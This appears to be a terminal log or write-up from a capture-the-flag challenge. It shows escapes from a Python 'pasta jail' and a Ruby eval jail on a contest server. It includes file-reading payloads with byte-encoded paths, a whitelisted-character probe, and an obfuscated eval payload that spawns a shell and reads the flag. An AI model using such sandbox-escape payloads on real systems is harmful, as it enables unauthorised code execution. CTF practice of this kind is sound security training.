#ruifi47, tmv11
% nc 92.246.89.201 8888


                                                                                  
                              ██              ██                                  
                            ██              ██                                    
                          ██        ██    ██                                      
                          ██      ██      ██                                      
                            ██    ██        ██                                    
            ░░░░              ▒▒  ██          ▒▒  ░░                              
                              ██    ██        ██                                  
                            ██        ██    ██                                    
                                      ██  ██                                      
                                    ██                                            
                                                  ░░                              
                  ██████        ████████████                                      
                ██      ██    ██            ██                                    
              ██    ████  ████    ████████    ██              ████                
            ██    ██    ████    ██        ██    ██████      ██    ██              
            ██  ██  ██████    ██    ████    ██    ██  ██  ██        ██            
          ██  ▓▓  ██  ██    ██    ██    ██    ██    ▓▓  ▓▓          ██            
          ████████████████████████████████████████████████████    ██              
            ██████████████████████████████████████      ████    ██                
            ██████████████████████████████████████      ████  ██                  
              ██████████████████████▓▓██████████      ████    ██                  
                ██████████████████████████████    ██████        ██                
                  ██████████████████████████  ████████                            
                      ██████████████▓▓████████▓▓▓▓                                
                                                                                  
                                                                                  
 


🍴🍴🍴 open(bytes([46, 47, 102, 108, 97, 103, 46, 116, 120, 116]).decode()).read()
read key

🍴🍴🍴 open(bytes([46, 47, 107, 101, 121]).decode()).read()
guera

Yep, not the flag..., use 'guera' as the password for the real challenge at port 8889


% python3 whitelisted_char_discovery.py
['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'e', 'l', 'v', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '!', '"', '#', '$', '%', '&', "'", '(', ')', '*', '+', ',', '-', ':', ';', '<', '=', '>', '?', '@', '[', '\\', ']', '^', '`', '{', '|', '}', '~', '\t', '\n', '\r', '\x0b', '\x0c']


% nc 92.246.89.201 8889
Just a check you solved last part...
What was the key...?
guera
Oh Oh you escaped from a pasta jail..., can you escape from a bank and steal a precious ruby?...


Welcome to:
HACKAPPATOI's Jewelry (We got funds from zio Berlusca)
Here you will find a magnific 1337 Jewel
 
        _______
      .'_/_|_\_'.
      \`\  |  /`/
       `\\ | //'
         `\|/`
           `

But you need to obtain it and it won't be so easy...
You have a command to get it....
Good Luck!
Enter command:
eval((''<<101)+(''<<120)+(''<<101)+(''<<99)+(''<<32)+(''<<34)+(''<<115)+(''<<104)+(''<<34))
id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
cat flag
HCTF{1s_d1z_r34l1ty_0r_F1c710n?}
